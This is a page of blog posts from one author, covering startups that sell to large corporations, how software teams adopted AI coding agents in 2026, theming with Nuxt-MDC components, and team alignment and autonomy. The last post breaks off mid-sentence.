Latest Posts (15 found)
Hugo 5 days ago

The B2BigB Syndrome: How Large Corporations Quietly Kill Startups

In the late 2000s, I worked at a software publisher and one of my colleagues started a company. It was a kind of corporate Second Life , where an avatar could move around and trigger discussions with other people. I don't remember the details anymore, but with hindsight and probably lots of exaggeration, I'd say it was like Gather but 15 years ahead of its time. The application seemed to work well and the company was lining up meetings with major corporations that seemed super interested in rolling it out across their enterprise. We're talking about big banks, major energy suppliers, really serious companies. Except it dragged on. A month. A quarter. A year. Then two. And eventually the company died waiting for an actual signature and, incidentally, some cash. My friend unfortunately ran into the infamous B2BigB syndrome, this curse (a French one?) that tends to kill a lot of companies every year. So if you're starting a company today or thinking about it, I invite you to think twice before prioritizing this segment, and that's what we're going to talk about today. First, I need to define this acronym. In the business world, we tend to segment companies based on the customers they target: For example, Netflix is B2C and Jira is B2B. Among all this you have plenty of nuances. Microsoft sells in both B2C and B2B, for example. You have C2C platforms (exchanges between individuals). But let's keep it simple and just talk about B2C and B2B. Except "B" is broad. Between a 5-person company and a 40,000-person conglomerate, the way you sell to the two is very different. And in this category, there's a category of death: large corporations. It's hard to really say when a large corporation begins, but you recognize them easily. A large corporation starts when a decision requires a ton of meetings, a quarter, a steering committee and board approval or a purchasing department sign-off. In practice, you can even have 500-person companies that behave this way, even if it's more common starting at 1,000. But in any case, it gets worse with size. A quarter can become a year, or even 2, or even 5 (and I swear I've seen sales cycles that long). Anyway, that's what I call the BigB (the big B's). The big advantage of BigB's is, in theory, the ability to buy expensive because we're talking about deployment across an entire large corporation, so volumes that make most startups' eyes light up. Except that, it's often a mirage. The moment you start looking at costs and margins, not to mention all the associated risks. Working with a large corporation is often synonymous with complexity, and that complexity is financed by specialists. You have to respond to costly processes (a 200-page security questionnaire, legal questionnaires, framework contracts, ISO certification this and that) that often requires a lot of specialists (lawyers, security experts, finance people, etc.). And that's just to get through the first step of the sales cycle. To sell to a large corporation, you need to be prepared to spend a fortune. By the way, it's worth noting that this doesn't prevent these large corporations from regularly appearing on the monthly data breach list. Because no, churning out Excel questionnaires is not synonymous with security quality. After that, you're quickly going to fall into the spiral of quarterly meetings with a bunch of people you'll only see once in your life, some of whom will take advantage of their temporary power to take out their frustrations and pet peeves on you. And since you'll be in a weak position, well... This time is time not spent on the product. Of course it's normal to spend time on sales, but we're talking about quarterly meetings to prepare, with McKinsey-style PowerPoints (you sometimes even see scale-ups calling in consulting firms to fill out these documents) that will require weeks of preparation. Again, to sell to a large corporation, you need to already be prepared to spend a fortune and wait ages. But let's imagine you've finally got the green light to deploy in a large corporation. The contract is signed. Now it's up to you to figure out adoption. Actually, this is the beginning of a second nightmare. A year has passed since the beginning of the sales cycle. All your previous contacts are gone. They might have been contractors who left the company. Or executives who got transferred to other branches of the group. And now you have to find the people capable of helping you deploy your software because without a doubt your revenue depends on how much the software is actually used. No deployment, no money. So you're going to need a dedicated team of salespeople capable of navigating complex bureaucracy to find the right contacts, and maybe even a dedicated implementation team. Your costs are going to explode and you still won't have made anything at this stage. With a bit of luck, and because you were smart enough to get a payment at signature, you'll eventually issue your first invoice. That will be paid 8 months later, end of month . The first 3 months having caused countless incidents because a purchase order needed to be signed and you had to go through 3 different departments for that. Bad luck, your cash flow is starting to choke. You reach the end of the first year and then the purchasing department will come see you to renegotiate the contract, knowing full well that, in theory, they're your biggest client so it would be natural to do them a favor. In short, 2 years later, you've spent a fortune, your cash flow is negative, and your margin has melted like snow during a World Cup ski race in Saudi Arabia. OK, let's say I'm exaggerating and that despite everything, this contract allowed you to instead cross a threshold, to have an impressive signature to put forward and life continues for your startup/scaleup. Actually, you don't know it yet, but you've invited a Trojan horse into your company. Working with a large corporation means accepting the complexity inherent to that business. If it took you 2 years to sign a contract with them, imagine that everything else takes the same time. Your product has to evolve to fit their way of working. You'll be asked for 12-level approval workflows, software integrations with ERPs, broken enterprise SSO, integrations with legacy systems from the 90s. And every company has its own internal jargon that you'll be asked to force into your software. You'll invoice in units of work, have a "purchasing" role in your RBAC schemas (authorization systems), in short, in reality, you're going to develop an extension of your first client's IT infrastructure with all its constraints, its complexity, its slow onboarding, and its costs. And when you have a client representing 80% of your revenue (and even from 20% onwards it really starts to matter), you can hardly say no. So your roadmap is regularly hijacked by salespeople dedicated to this client, and globally a product that drifts away from the mass market. And that's normal, hey, I'm not throwing stones at that team. If you've dedicated people to a client, it's normal they try to influence how you build the product and even if the requests are absurd. Because that team doesn't have the perspective needed to judge. And when the roadmap is regularly sidetracked, it's also a huge amount of customization debt that will end up slowing the entire product. This big client may have allowed you to double your headcount. But 3/4 of the company will end up working for them, and will develop their own software culture, less UX sense, less sensitivity to product performance (no point working on acquisition or conversion, for example). All enterprise software has terrible UX, because first, that's not what drives sales, and second, because after burning money in the sales process, certification and onboarding, you have to make savings somewhere, often on the product which is no longer really central to the relationship with this client. They'll try to reassure you by saying no, it's important, but actually, the product at that point has become a cost center that needs to be optimized to not lose more margin. Margin eaten by the consulting firm that helped you determine your deployment strategy and pricing... But even when you "improve" your product for this client, you're going to continuously degrade it for all the others you thought you'd attract next by showcasing this win on your beautiful landing page. Because again, you're going to impose their complexity on all the other companies that could have been interested in your services. I'm obviously painting a dark picture. And there are companies that specialized FROM DAY 1 in large corporations, that tailored their commercial offering taking into account all the associated costs. Deployments are priced at 100k, contracts impose minimum usage, everything was framed from the start because the strategy was always to expand exclusively here. But for all the companies that think "just" doing a BigB to get a validation badge, but who actually target the entire SMB market and are looking for volume. It's rarely a good plan. At the beginning I said: "this curse (a French one?)". Why do I say it's a great French curse? Actually it's probably a magnifying glass effect and I'd certainly see the same thing in every country. But every year, I see companies that die after quarters of waiting for that famous contract with a large corporation (just yesterday I was talking to someone who told me the exact same story). So I think there's something a bit different about us. We like to be different. Partly, I get the sense it's related to the size of our SMB market which is less important than in Germany (the German Mittelstand seems bigger). We go faster from SMB to large corporations. Obviously, then, in terms of credibility, it's easier to sell a product once you have the logo of a large corporation than a bunch of logos of unknown companies. What's certain is that culturally, there's the CAC 40 and everything else. The CAC 40 has been basically the same companies for 30 or 40 years. By contrast, look at the S&P 500, in 1990 it was Exxon, GE, Philip Morris, IBM. They've all given way to Apple, Nvidia, Amazon, Google. In France, the large corporations in the CAC are structurally stable and dominant, which makes them all the more attractive as clients for startups. They have budgets, longevity, legitimacy. But these same large corporations aren't springboards to a global market — they're markets closed in on themselves. And conversely the SMB market can work. If I look at Pennylane, Qonto, Indy, Payfit, Spendesk, Livestorm, it's precisely by targeting this market that they've managed to go far. By contrast, I have real questions about the strategy of a company like Mistral which seems to position itself only on large corporations (on-premise deployment, Azure partnerships, etc.) and seems to be neglecting the mass market. I hope it won't be the future DailyMotion, which favored big media and telecom operators while missing the opportunity to become the B2C media platform that YouTube managed to become. You'll have gathered, if you're starting a company today, I'd tend to advise you to not see "B2B" as a single big playground. I'd tend to tell you to avoid B2BigB which is often destructive for startups and often ends up leading to a dead end. It's still possible, but you need to be armed for it. And if that's your choice, I'll only say one thing. Good luck :) Targeting large corporations (and the public sector) obviously gives you access to larger markets. But I'd tend to recommend tackling that step later, when the company is already solid. When DJI (Chinese drones) attacked the professional market, they already had a huge foothold in the B2C market. They came with an expertise and know-how that allowed them to be sovereign over their decisions. Now if you're tempted anyway, the recipe for having a chance is above all a question of seniority of leadership: you need to know how to say no firmly, you need to stop chasing every rabbit that passes by when you see a so-called "low hanging fruit", the expression that has replaced "quick win" as one of my most hated expressions. There's no such thing as effortless gain. Everything has a cost, even when it's hidden. And you need a good financial and reputational foundation to impose these conditions, hence the advice to already have a good base on the other segments. It's easier to say no when a client represents 2% than when they represent 20%. One strategy I've seen work several times is to create software with great UX, get adopted by the teams, then go see the purchasing departments of the companies in question and put the usage figures under their nose: "See, you already have 300 people using it, wouldn't you like to set up a framework contract and better understand usage at your company?" That's interesting because you've created a product whose adoption happened from the teams, you didn't modify your roadmap, and you're in a strong position with procurement to improve your presence without being pressured on everything else. In short, make a good product, track usage, wait until you have enough footprint, and then go negotiate. Anthropic (Claude Code) by first targeting individual developers (indie hackers, side projects) and small teams was pushed to constantly improve its product which became number 1 in its category (at the time of writing, this passage might age poorly :)). Today, they're selling enterprise licenses. Good companies are able to do volume and then move up the chain, small companies then large companies. I've rarely (never?) seen the reverse. When you do large corporations, you don't know how to come back to the rest of the segments. B2C (Business to Consumer), that's the general public. B2B (Business to Business), that's selling to companies.

0 views
Hugo 3 weeks ago

AI's Impact on the State of the Art in Software Engineering in 2026

2025 marked a major turning point in AI usage, far beyond simple individual use. Since 2020, we've moved from autocomplete to industrialization: Gradually moving from a few lines produced by autocomplete to applications coded over 90% by AI assistants, dev teams must face the obligation to industrialize this practice at the risk of major disappointments. And more than that, as soon as the developer's job changes, it's actually the entire development team that must evolve with it. It's no longer just a simple tooling issue, but an industrialization issue at the team scale, just as automated testing frameworks changed how software was created in the early 2000s. (We obviously tested before the 2000s, but how we thought about automating these tests through xUnit frameworks, the advent of software factories (CI/CD), etc., is more recent) In this article, we'll explore how dev teams have adapted through testimonials from several tech companies that participated in the writing by addressing: While the term vibe coding became popular in early 2025, we now more readily speak of Context driven engineering or agentic engineering . The idea is no longer to give a prompt, but to provide complete context including the intention AND constraints (coding guidelines, etc.). Context Driven Engineering aims to reduce the non-deterministic part of the process and ensure the quality of what is produced. With Context Driven Engineering, while specs haven't always been well regarded, they become a first-class citizen again and become mandatory before code. Separate your process into two PRs: Source: Charles-Axel Dein (ex CTO Octopize and ex VP Engineering at Gens de confiance) We find this same logic here at Clever Cloud: Here is the paradox: when code becomes cheap, design becomes more valuable. Not less. You can now afford to spend time on architecture, discuss tradeoffs, commit to an approach before writing a single line of code. Specs are coming back, and the judgment to write good ones still requires years of building systems. Source: Pierre Zemb (Staff Engineer at Clever Cloud) or at Google One common mistake is diving straight into code generation with a vague prompt. In my workflow, and in many others', the first step is brainstorming a detailed specification with the AI, then outlining a step-by-step plan, before writing any actual code. Source: Addy Osmani (Director on Google Cloud AI) In short, we now find this method everywhere: Spec: The specification brings together use cases: the intentions expressed by the development team. It can be called RFC (request for change), ADR (architecture decision record), or PRD (Product requirement document) depending on contexts and companies. This is the basic document to start development with an AI. The spec is usually reviewed by product experts, devs or not. AI use is not uncommon at this stage either (see later in the article). But context is not limited to that. To limit unfortunate AI initiatives, you also need to provide it with constraints, development standards, tools to use, docs to follow. We'll see this point later. Plan: The implementation plan lists all the steps to implement the specification. This list must be exhaustive, each step must be achievable by an agent autonomously with the necessary and sufficient context. This is usually reviewed by seniors (architect, staff, tech lead, etc., depending on companies). Act: This is the implementation step and can be distributed to agentic sessions. In many teams, this session can be done according to two methods: We of course find variations, such as at Ilek which details the Act part more: We are in the first phase of industrialization which is adoption. The goal is that by the end of the quarter all devs rely on this framework and that the use of prompts/agents is a reflex. So we're aiming for 100% adoption by the end of March. Our workflow starts from the need and breaks down into several steps that aim to challenge devs in the thinking phases until validation of the produced code. Here's the list of steps we follow: 1- elaborate (challenges the need and questions edge cases, technical choices, architecture, etc.) 2- plan (proposes a technical breakdown, this plan is provided as output in a Markdown file) 3- implement (Agents will carry out the plan steps) 4- assert (an agent will validate that the final result meets expectations, lint, test, guideline) 5- review (agents will do a technical and functional review) 6- learn (context update) 7- push (MR creation on gitlab) This whole process is done locally and piloted by a developer. Cédric Gérard (Ilek) While this 3-phase method seems to be consensus, we see quite a few experiments to frame and strengthen these practices, particularly with two tools that come up regularly in discussions: Bmad and SpeckKit . Having tested both, we can quite easily end up with somewhat verbose over-documentation and a slowdown in the dev cycle. I have the intuition that we need to avoid digitally reproducing human processes that were already shaky. Do we really need all the roles proposed by BMAD for example? I felt like I was doing SaFe in solo mode and it wasn't a good experience :) What is certain is that if the spec becomes queen again, the spec necessary for an AI must be simple, unambiguous. Verbosity can harm the effectiveness of code assistants. While agentic mode seems to be taking over copilot mode, this comes with additional constraints to ensure quality. We absolutely want to ensure: To ensure the quality produced, teams provide the necessary context to inform the code assistant of the constraints to respect. Paradoxically, despite vibe coding's bad reputation and its use previously reserved for prototypes, Context Driven Engineering puts the usual good engineering practices (test harness, linters, etc.) back in the spotlight. Without them, it becomes impossible to ensure code and architecture quality. In addition to all the classic good practices, most agent systems come with their own concepts: the general context file ( agents.md ), skills, MCP servers, agents. A code assistant will read several files in addition to the spec you provide it. Each code assistant offers its own file: for Claude, for Cursor, for Windsurf, etc. There is an attempt at harmonization via agents.md but the idea is always broadly the same: a sort of README for AI. This README can be used hierarchically, we can indeed have a file at the root, then a file per directory where it's relevant. This file contains instructions to follow systematically, example: and can reference other files. Having multiple files allows each agent to work with reduced context, which improves the efficiency of the agent in question (not to mention savings on costs). Depending on the tools used, we find several notions that each have different uses. A skill explains to an AI agent how to perform a type of operation. For example, we can give it the commands to use to call certain code generation or static verification tools. An agent can be involved to take charge of a specific task. We can for example have an agent dedicated to external documentation with instructions regarding the tone to adopt, the desired organization, etc. MCP servers allow enriching the AI agent's toolbox. This can be direct access to documentation (for example the Nuxt doc ), or even tools to consult test account info like Stripe's MCP . It's still too early to say, but we could see the appearance of a notion of technical debt linked to the stacking of these tools and it's likely that we'll see refactoring and testing techniques emerge in the future. With the appearance of these new tools comes a question: how to standardize practice and benefit from everyone's good practices? As Benjamin Levêque (Brevo) says: The idea is: instead of everyone struggling with their own prompts in their corner, we pool our discoveries so everyone benefits. One of the first answers for pooling relies on the notion of corporate marketplace: At Brevo, we just launched an internal marketplace with skills and agents. It allows us to standardize code generated via AI (with Claude Code), while respecting standards defined by "experts" in each domain (language, tech, etc.). The 3 components in claude code: We transform our successes into Skills (reusable instructions), Subagents (specialized AIs) and Patterns (our best architectures). Don't reinvent the wheel: We move from "feeling-based" use to a systematic method. Benjamin Levêque and Maxence Bourquin (Brevo) At Manomano we also initiated a repository to transpose our guidelines and ADRs into a machine-friendly format. We then create agents and skills that we install in claude code / opencode. We have an internal machine bootstrap tool, we added this repo to it which means all the company's tech people are equipped. It's then up to each person to reference the rules or skills that are relevant depending on the services. We have integration-type skills (using our internal IaC to add X or Y), others that are practices (doing code review: how to do react at Manomano) and commands that cover more orchestrations (tech refinement, feature implementation with review). We also observe that it's difficult to standardize MCP installations for everyone, which is a shame when we see the impact of some on the quality of what we can produce (Serena was mentioned and I'll add sequential-thinking). We're at the point where we're wondering how to guarantee an iso env for all devs, or how to make it consistent for everyone Vincent AUBRUN (Manomano) At Malt, we also started pooling commands / skills / AGENTS.MD / CLAUDE.MD. Classically, the goal of initial versions is to share a certain amount of knowledge that allows the agent not to start from scratch. Proposals (via MR typically) are reviewed within guilds (backend / frontend / ai). Note that at the engineering scale we're still searching a lot. It's particularly complicated to know if a shared element is really useful to the greatest number. Guillaume Darmont (Malt) Note that there are public marketplaces, we can mention: Be careful however, it's mandatory to review everything you install… Among deployment methods, many have favored custom tools, but François Descamps from Axa cites us another solution: For sharing primitives, we're exploring APM ( agent package manager ) by Daniel Meppiel. I really like how it works, it's quite easy to use and is used for the dependency management part like NPM. Despite all the instructions provided, it regularly happens that some are ignored. It also happens that instructions are ambiguous and misinterpreted. This is where teams necessarily implement tools to frame AIs: While the human eye remains mandatory for all participants questioned, these tools themselves can partially rely on AIs. AIs can indeed write tests. The human then verifies the relevance of the proposed tests. Several teams have also created agents specialized in review with very specific scopes: security, performance, etc. Others use automated tools, some directly connected to CI (or to Github). (I'm not citing them but you can easily find them). Related to this notion of CI/CD, a question that often comes up: It's also very difficult to know if an "improvement", i.e. modification in the CLAUDE.MD file for example, really is one. Will the quality of responses really be better after the modification? Guillaume Darmont (Malt) Can I evaluate a model? If I change my guidelines, does the AI still generate code that passes my security and performance criteria? Can we treat prompt/context like code (Unit testing of prompts). To this Julien Tanay (Doctolib) tells us: About the question "does this change on the skill make it better or worse", we're going to start looking at and (used in prod for product AI with us) to do eval in CI.(...) For example with promptfoo, you'll verify, in a PR, that for the 10 variants of a prompt "(...) setup my env" the env-setup skill is indeed triggered, and that the output is correct. You can verify the skill call programmatically, and the output either via "human as a judge", or rather "LLM as a judge" in the context of a CI All discussions seem to indicate that the subject is still in research, but that there are already work tracks. We had a main KPI which was to obtain 100% adoption for these tools in one quarter (...) At the beginning our main KPI was adoption, not cost. Julien Tanay (Staff engineer at Doctolib) Cost indeed often comes second. The classic pattern is adoption, then optimization. To control costs, there's on one hand session optimization, which involves For example we find these tips proposed by Alexandre Balmes on Linkedin . This cost control can be centralized with enterprise licenses. This switch between individual key and enterprise key is sometimes part of the adoption procedure: We have a progressive strategy on costs. We provide an api key for newcomers, to track their usage and pay as close to consumption as possible. Beyond a threshold we switch them to Anthropic enterprise licenses as we estimate it's more interesting for daily usage. Vincent Aubrun (ManoMano) On the monthly cost per developer, the various discussions allow us to identify 3 categories: The vast majority oscillates between category 1 and 2. When we talk about governance, documentation having become the new programming language, it becomes a first-class citizen again. We find it in markdown specs present on the project, ADRs/RFCs, etc. These docs are now maintained at the same time as code is produced. So we declared that markdown was the source of truth. Confluence in shambles :) Julien Tanay (Doctolib) It's no longer a simple micro event in the product dev cycle, managed because it must be and put away in the closet. The most mature teams now evolve the doc to evolve the code, which avoids the famous syndrome of piles of obsolete company documents lying around on a shared drive. This has many advantages, it can be used by specialized agents for writing user doc (end user doc), or be used in a RAG to serve as a knowledge base, for customer support, onboarding newcomers, etc. The integration of this framework impacts the way we manage incidents. It offers the possibility to debug our services with specialized agents that can rely on logs for example. It's possible to query the code and the memory bank which acts as living documentation. Cédric Gérard (Ilek) One of the major subjects that comes up is obviously intellectual property. It's no longer about making simple copy-pastes in a browser with chosen context, but giving access to the entire codebase. This is one of the great motivations for switching to enterprise licenses which contain contractual clauses like "zero data training", or even " zero data retention ". In 2026 we should also see the appearance of the AI act and ISO 42001 certification to audit how data is collected and processed. In enterprise usage we also note setups via partnerships like the one between Google and Anthropic: On our side, we don't need to allocate an amount in advance, nor buy licenses, because we use Anthropic models deployed on Vertex AI from one of our GCP projects. Then you just need to point Claude Code to Vertex AI. This configuration also addresses intellectual property issues. On all these points, another track seems to be using local models. We can mention Mistral (via Pixtral or Codestral) which offers to run these models on private servers to guarantee that no data crosses the company firewall. I imagine this would also be possible with Ollama. However I only met one company working on this track during my discussions. But we can anticipate that the rise of local models will rather be a 2026 or 2027 topic. While AI is now solidly established in many teams, its impacts now go beyond the framework of development alone. We notably find reflections around recruitment at Alan Picture this: You're hiring a software engineer in 2025, and during the technical interview, you ask them to solve a coding problem without using any AI tools. It's like asking a carpenter to build a house without power tools, or a designer to create graphics without Photoshop. You're essentially testing them on skills they'll never use in their actual job. This realization hit us hard at Alan. As we watched our engineering teams increasingly rely on AI tools for daily tasks — with over 90% of engineers using AI-powered coding assistants — we faced an uncomfortable truth: our technical interview was completely disconnected from how modern engineers actually work. Emma Goldblum (Engineering at Alan) One of the big subjects concerns junior training who can quickly be in danger with AI use. They are indeed less productive now, and don't always have the necessary experience to properly challenge the produced code, or properly write specifications. A large part of the tasks previously assigned to juniors is now monopolized by AIs (boiler plate code, form validation, repetitive tasks, etc.). However, all teams recognize the necessity to onboard juniors to avoid creating an experience gap in the future. Despite this awareness, I haven't seen specific initiatives on the subject that would aim to adapt junior training. Finally, welcoming newcomers is disrupted by AI, particularly because it's now possible to accompany them to discover the product Some teams have an onboarding skill that helps to setup the env, takes a tour of the codebase, makes an example PR... People are creative* Julien Tanay (Doctolib) As a side effect, this point is deemed facilitated by the changes induced by AI, particularly helped by the fact that documentation is updated more regularly and that all guidelines are very explicit. One of the little-discussed elements remains supporting developers facing a mutation of their profession. We're moving the value of developers from code production to business mastery. This requires taking a lot of perspective. Code writing, practices like TDD are elements that participate in the pleasure we take in work. AI comes to disrupt that and some may not be able to thrive in this evolution of our profession Cédric Gérard (Ilek) The question is not whether the developer profession is coming to an end, but rather to what extent it's evolving and what are the new skills to acquire. We can compare these evolutions to what happened in the past during transitions between punch cards and interactive programming, or with the arrival of higher-level languages. With AI, development teams gain a level of abstraction, but keep the same challenges: identifying the right problems to solve, finding what are the adequate technological solutions, thinking in terms of security, performance, reliability and tradeoffs between all that. Despite everything, this evolution is not necessarily well experienced by everyone and it becomes necessary in teams to support people to consider development from a different angle to find the interest of the profession again. Cédric Gérard also warns us against other risks: There's a risk on the quality of productions that decreases. AI not being perfect, you have to be very attentive to the generated code. However reviewing code is not like producing code. Review is tedious and we can very quickly let ourselves go. To this is added a risk of skill loss. Reading is not writing and we can expect to develop an evaluation capacity, but losing little by little in creativity 2025 saw the rise of agentic programming, 2026 will undoubtedly be a year of learning in companies around the industrialization of these tools. There are points I'm pleased about, it's the return in force of systems thinking . "Context Driven Engineering" forces us to become good architects and good product designers again. If you don't know how to explain what you want to do (the spec) and how you plan to do it (the plan), AI won't save you; it will just produce technical debt at industrial speed. Another unexpected side effect could be the end of ego coding , the progressive disappearance of emotional attachment to produced code that sometimes created complicated discussions, for example during code reviews. Hoping this makes us more critical and less reluctant to throw away unused code and features. In any case, the difference between an average team and an elite team has never been so much about "old" skills. Knowing how to challenge an architecture, set good development constraints, have good CI/CD, anticipate security flaws, and maintain living documentation will be all the more critical than before. And from experience this is not so acquired everywhere. Now, there are questions, we'll have to learn to pilot a new ecosystem of agents while keeping control. Between sovereignty issues, questions around local models, the ability to test reproducibility and prompt quality, exploding costs and the mutation of the junior role, we're still in full learning phase. 2021 with Github Copilot: individual use, essentially focused on advanced autocomplete. then browser-based use for more complex tasks, requiring multiple back-and-forths and copy-pasting 2025 with Claude Code, Windsurf and Cursor: use on the developer's workstation through code assistants Context Driven Engineering, the new paradigm Spec/Plan/Act: the reference workflow The AI Rules ecosystem Governance and industrialization Human challenges The PR with the plan. The PR with the implementation. The main reason is that it mimics the classical research-design-implement loop. The first part (the plan) is the RFC. Your reviewers know where they can focus their attention at this stage: the architecture, the technical choices, and naturally their tradeoffs. It's easier to use an eraser on the drawing board, than a sledgehammer at the construction site copilot /pair programming mode with validation of each modification one by one agent mode, where the developer gives the intention then verifies the result (we'll see how later) that the implementation respects the spec that the produced code respects the team's standards that the code uses the right versions of the project's libraries the Claude marketplace a marketplace by vercel test harness code reviews keeping session windows short, having broken down work into small independent steps. using the /compact command to keep only the necessary context (or flushing this context into a file to start a new session)

3 views
Hugo 1 months ago

Using custom components with Nuxt-mdc to build a theming system

I'm building a blogging platform ( Writizzy ), an alternative to Ghost or Substack. Under the hood I use Nuxt, but I don't use nuxt-content to have more flexibility, so I use the Nuxt-Mdc module directly. This module allows you to extend markdown to include custom components, such as image galleries, embedded YouTube players, and more. However, Writizzy offers themes, and we want to easily customize components for each theme. In this article, I'll show you how to use Nuxt-Mdc for this fairly common use case. The nuxt-mdc module is used by nuxt content, but it can also be used directly to parse markdown content and render it as HTML. It's a core building block of Nuxt-Content, but fortunately it works as a standalone module. Among Nuxt-mdc's features, you can use MDC components . An MDC component is essentially a markdown syntax that calls a Vue component for rendering. For example, with this markup: We're telling Nuxt-mdc to use the Card component to render the block above. This is also what Nuxt-mdc uses to render all Prose components , which are custom components for headings, links, blockquotes, etc., created after markdown parsing. Internally, each standard Markdown element is transformed into MDC components. For example: is transformed into (This is a simplification . In reality, it's more of a substitution at the renderer level. The renderer reads the AST tree containing an h2 node and decides to use the h2 component to render it. But this is a good way to think about it.) This feature allows Nuxt-Mdc users to customize the rendering of each MDC component, including Prose components. To override a Prose component or create a custom component, you just need to place them in the directory of your Nuxt application. But what if you want these components to change based on the selected theme? That's exactly the question I faced with Writizzy. In Writizzy, I'm developing a theming system. You can choose your blog's appearance from the themes listed here . I partially reused what I had already built for Bloggrify (an open source project for creating static blogs). But with Writizzy, I was quite unsatisfied with this solution, especially for custom components. Obviously, the appearance of custom components should change based on the theme. It turns out there's an undocumented feature in Nuxt-Mdc that does exactly this. By default, the documentation recommends using the MDC component to display markdown, for example: However, MDC uses **MDCRenderer **behind the scenes. And looking at MDCRenderer's source code , we notice an interesting prop: This prop allows you to pass the list of components to use. By default, MDCRenderer will look in this list first, then fall back to , so you can override only the components you want to modify: And that's it! Now you can customize each component based on the theme. This approach works well for Writizzy, and I plan to apply it to Bloggrify as well. If you're using Nuxt-MDC with a theming system, I think this is the cleanest solution—even though it deserves to be officially documented. I've opened an issue to clarify its status. In the meantime, it's working in production on Writizzy without any issues.

0 views
Hugo 1 months ago

Alignment, Autonomy and context

Over the years, I've met and observed teams that were competent and yet failed: working on the wrong priorities, sometimes working on the right objectives, but with unsuitable solutions, sometimes working with no priorities at all. The root cause of these problems can be articulated around these 3 words: autonomy, alignment, and context . If these words seem relatively simple to understand, in practice, their implementation is not trivial. How do you ensure that everyone in a team is trying to solve the same problems? What does autonomy mean within a group, and what are its limits? Perhaps you've heard the term "empowered teams"? And thought it was yet another new consultant concept? The expression gained popularity via the book Empowered by Marty Cagan . In simple terms, an empowered team works on a problem to be solved, as opposed to a feature team which works on a list of functionalities (the famous roadmap). We also speak of a team that prioritizes outcomes (impacts) over outputs (deliverables). The first thing I'd like to stress is that this isn't just a topic for product managers. Any senior person in Engineering should be involved in decision-making, for example : I'm writing this chapter for any technical leader looking to create impact. To do this, we'll see that creating autonomy, alignment and knowing how to communicate the context are levers for achieving this. Here, as a Tech Leader you can be in two situations, but often in both at the same time: To tackle this subject, I'm going to start from a drawing by Henrik Kniberg about alignment and empowerment. "Empowered teams" being the teams in the top right-hand corner. This drawing is part of a keynote given in 2016 that I invite you to watch. In this keynote, it's about a group, whose goal is to cross a river to settle on the other side of the bank. The lower-left corner shows a group with little autonomy, no alignment and no precise directions. No one in this part of the quadrant has taken the initial problem of crossing the river personally. The symptoms of such an organization in a technological context : What can be done about it? It's a tough job on this part of the quadrant. Even before talking about autonomy, the first issue will be to get people to agree on a common goal. The role of a tech leader is to get close to the business, or its closest representative, and understand the issues that need to be addressed. In this type of organization, the business is often far away and/or difficult to access. Breaking the distance can be difficult, and is not part of the company's culture. Technique and "best practices" are likely to be the least of your worries in this context, as the importance of connecting Engineering to the business is paramount. If we move to the right, we come across organizations made up of individuals or groups of individuals, each of whom has defined objectives, but all of which are different. If the group's objective is to cross a river, everyone is working on different things: some are growing vegetables, others are fishing, and a few leaders are wondering whether someone is working on crossing the river. There's a misunderstanding of autonomy here. Autonomy does not mean independence. A team that decides its priorities in its own corner doesn't make an impact, or does so by accident, and this success is hard to repeat many times over. And this doesn't mean that individual groups can't be highly effective. Unfortunately, impact is measured in global terms. The symptoms of such an organization in a technological context: What can be done about it? The observation is fairly similar to the previous one, but the work will be less arduous due to the highly entrepreneurial nature of the company. Here, the tech leader will be able to rely on committed teams. We'll need to work on alignment. But let's define this notion a little better. Alignment defines the ability of a group to all seek solutions to the same problem. Objective: A European company decides to enter the US market. Each team will seek to contribute to the same objective. However, in the drawing in the upper left corner, we can see a clear alignment without autonomy. One or more leaders can decide exactly what needs to be done to achieve an objective. The leader explicitly asks to build a bridge across the river. This mode of operation can be very effective, especially on a small scale with a visionary leader. But scaling up can cause problems, as the visionary leader can't spread out across the company and follow all the decisions. On several occasions, I've observed companies with very good leaders, but with great difficulty in managing rapid growth. They recruited people who were more junior than they were, more capable of carrying out a task than making decisions. These people then failed to scale up in the time available. Symptoms of such an organization in a technological context: What to do about it: If you're a tech leader, one of your responsibilities is recruitment. You have to recruit people who are better than you in certain areas. You have to learn to share your legos . The second important thing is to get out of the vicious circle: At stage 2, you have a major responsibility for coaching/mentoring to educate and provide the necessary context for more effective decision-making. If you're a tech leader, but you're in a situation where the work is delegated to you, you'll need to show that the team can be autonomous. To do this, two things are important: In our example above, a group that chose to build a catapult to hurl individuals to the other side would be showing a certain lack of understanding of the effect of gravity on human bodies :) Hopefully, the initiative would be stopped. Don't be the one to suggest the catapult . Bad: there are too few of us in the team, so we can't finish the project on time. Good: given the size of our team and our current speed, I've decided to cut back on some of the functionalities to meet the deadline. Bad: We're drowning in support. The team can't deliver project A on time. Good: We carried out a support analysis and noted a sharp increase in support cases linked to a bug in a recent feature. We decided to assign one person for a week to fix this bug and regain velocity on project A. Before I talk about the last quadrant, I need to talk a little about the "context". "Lead with context, not control" is a quote you'll find in the excellent book "No rules rules" by Erin Meyer and Reed Hastings. For a person or a group to make a good decision, they need to know the whole context. If we go back to our group, which has to cross a river, we lack the context to propose initiatives. Maybe we have to cross the river to find food. In which case, why didn't we decide to settle on this side? The leader failed to mention that we're in the territory of another tribe who has asked us to leave before autumn. Okay, and if the leader had told us that this tribe wasn't against trading with us after all, having a bridge would probably be more interesting in the future than just building a boat. Having the context allows you to make the right decisions. And in the corporate world, there are plenty of occasions when you neglect to give the full context, sometimes for the sake of speed, sometimes to protect your team, sometimes because you've forgotten. But without context, you can't expect people to make the right decisions. Context gives you the constraints that will enable you to propose the most appropriate technological solution. In this corner of the quadrant, the objective is clearly defined, such as crossing the river. The constraints are known, and each group is invited to contribute to the common goal. In theory, this is the most efficient type of organization, especially at scale. I'd like to point out two pitfalls at this stage: It doesn't make sense to hire smart people and tell them what to do; we hire smart people so they can tell us what to do. You have to accept the unexpected, accept that the solutions you come up with may not be the ones you originally imagined. If a group suggests crossing the river with a boat or a tunnel, or has spotted a ford a hundred meters downstream, it may be different from what you had in mind, but it may be more effective. Accept that not everything is as it seems in your head. BUT, if there are several groups working, one on building a tunnel, another on building a bridge, another on building a boat, you've got a problem. If everyone is working on the same problem with different solutions, that's also a form of misalignment . Again, autonomy doesn't mean independence, and there needs to be regular discussion around the initiatives launched to ensure overall coherence. Don't be the one working on creating a tunnel while everyone else is trying to build a bridge. Certain methodologies, such as OKRs for example, help to materialize this periodic discussion. Objective: The product should enable the acquisition of 10,000 prospects in the USA. Quarter 1 initiatives: Quarter 2 initiatives: The coherence of the initiatives is linked to a discussion at the beginning of the quarter of what each group has come up with to contribute to the initial lead acquisition objective. This step, designed to ensure the coherence of initiatives, can be found in many methodologies: I must stress once again that autonomy does not mean independence. If, during these discussions, a decision is made to favor a bet, and it's not the solution you 